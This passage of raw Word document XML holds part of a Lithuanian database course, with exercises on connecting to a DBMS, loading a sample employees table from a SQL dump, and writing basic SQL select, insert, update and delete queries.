      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kiekvienas gamintojas identifikuojamas pagal įmonės pavadinimą, kartu saugoma gamintojo valstybė.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prekės, gaminamos parduotuvėje, nėra susiejamos su gamintoju</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildykite duomenų bazės modelį ir parašykite šias užklausas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas parduotuves, kuriose yra Vokietijos gamintojų prekės</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visas parduotuves, kuriose yra brangesnių nei 1 euras nurodyto gamintojo prekių.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc13095523"/>
      <w:bookmarkStart w:id="155" w:name="_Toc13833417"/>
      <w:bookmarkStart w:id="156" w:name="_Toc14392448"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Kompetencija. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Programiškai įgyvendinti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir administruoti duomenų bazes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkEnd w:id="156"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc10443975"/>
      <w:bookmarkStart w:id="158" w:name="_Toc13095524"/>
      <w:bookmarkStart w:id="159" w:name="_Toc13833418"/>
      <w:bookmarkStart w:id="160" w:name="_Toc14392449"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.1. Mokymosi rezultatas. Diegti ir valdyti duomenų bazių valdymo sistemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. PRISIJUNKITE PRIE DUOMENŲ BAZIŲ VALDYMO SISTEMOS NAUDODAMI TELNET</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. PAKARTOKITE TUOS PAČIUS VEIKSMUS NAUDODAMI PHPMYADMIN</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc10443976"/>
      <w:bookmarkStart w:id="162" w:name="_Toc13095525"/>
      <w:bookmarkStart w:id="163" w:name="_Toc13833419"/>
      <w:bookmarkStart w:id="164" w:name="_Toc14392450"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti SQL kalbą duomenų bazės užpildy</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>mui ir informacijos išrinkimui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>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PANAUDOKITE TINKAMAS PAGRINDINES SQL KOMANDAS</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Duota:  darbuotojai.sq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DROP TABLE IF EXISTS `DARBUOTOJAI`;</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CREATE TABLE `DARBUOTOJAI` (</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ASMENSKODAS` bigint(20)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VARDAS` varchar(20)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PAVARDE` varchar(30)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DIRBANUO` date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GIMIMOMETAI` date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PAREIGOS` varchar(30)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SKYRIAUSPAVADINIMAS` varchar(30)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 xml:space="preserve">  `PROJEKTONUMERIS` int(11) DEFAULT NULL</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00"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p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="3" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02C00">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO `DARBUOTOJAI` VALUES (32541036850,'Mantas','Bananas','2010-08-01','1999-04-21','Programuotojas','Amzinai atostogose',2),(35206891026,'Justas','Zmogauskas','2008-02-04','1990-08-22','Programuotojas','Daug dirbantys',2),(35261458702,'Petrius','Kanusauskas','1996-04-18','1976-10-11','Programuotojas','Mazai dirbantieji',1),(36510284592,'Antanas','Smeliauskas','2006-05-04','1986-10-14','Testuotojas','Mazai dirbantys',1),(38962504820,'Zilvinas','Morkinis','2012-11-20','1988-06-15','Programuotojas','Mazai dirbantys',3),(39520146780,'Jonas','Jonauskas','1985-05-25','1960-05-04','Testuotojas','Daug dirbantieji',3),(42056548920,'Toma','Antanaitiene','2004-09-11','1979-05-11','Testuotoja','Daug dirbantys',2),(44205967260,'Juste','Karnisoviene','1988-09-06','1950-07-30','Projektu vadove','Vadovybe',1),(45289645130,'Zinaida','Zidane','1999-04-18','1980-04-01','Programuotoja','Amzinai atostogose',2),(49853148205,'Toma','Zidane','2010-10-06','1990-07-14','Projektu vadove','Vadovybe',2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATLIKITE UŽKLAUSAS H2 APLINKOJE IMPORTUOTOJE DB (NAUDOJAMOS PRIEMONĖS/APLINKOS - H2 APLINKA)</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis iš lentelės „DARBUOTOJAI“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis iš stulpelio „ASMENS KODAS“ lentelėje „DARBUOTOJAI“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis iš stulpelių „VARDAS“, „PAVARDĖ“, „PAREIGOS“lentelėje „DARBUOTOJAI“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite skirtingas reikšmes iš stulpelio „SKYRIAUSPAVADINIMAS“ lentelėje „DARBUOTOJAI“.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis apie darbuotojus, kurie dirba „Daug dirbantys“ skyriuje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite duomenis, kokias pareigas užima Toma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite visus duomenis apie darbuotojus, kurių gimimo data - 1960-05-04.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite darbuotojų vardus, kurių pavardės yra Morkinis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išrinkite duomenis (vardą ir pavardę) apie programuotojus iš „Daug dirbantys“ skyriaus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Įterpkite į lentelę „DARBUOTOJAI“naują darbuotoją, užpildydami visus reikiamus laukus (asmens kodą, vardą, pavardę, nuo kada pradėjo dirbti, gimimo metus, pareigas, skyriaus pavadinimą ir projekto numerį).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įterpkite į lentelę „DARBUOTOJAI“naują darbuotoją, užpildydami tik laukus: asmens kodą, vardą, pavardę, nuo kada pradėjo dirbti, gimimo metus. Pareigas, skyriaus pavadinimą ir projekto numerį palikite neužpildytus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Užpildykite likusius tuščius laukus „DARBUOTOJAI“ lentelėje, jūsų prieš tai įterptame įraše. Priskirkite darbuotojui pareigas, skyrių ir projektą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ištrinkite lentelės „DARBUOTOJAI“įrašą, kurio asmens kodas yra toks, kurį jūs sukūrėte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Įterpkite du darbuotojus pavarde Antanaitis, kurių pareigos būtų „Programuotojas“ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pakeiskite abiejų Antanaičių pareigas į „Testuotojas“ vienu sakiniu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Suskaičiuokite, kiek įmonėje dirba Testuotojų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc10443977"/>
      <w:bookmarkStart w:id="167" w:name="_Toc13095526"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
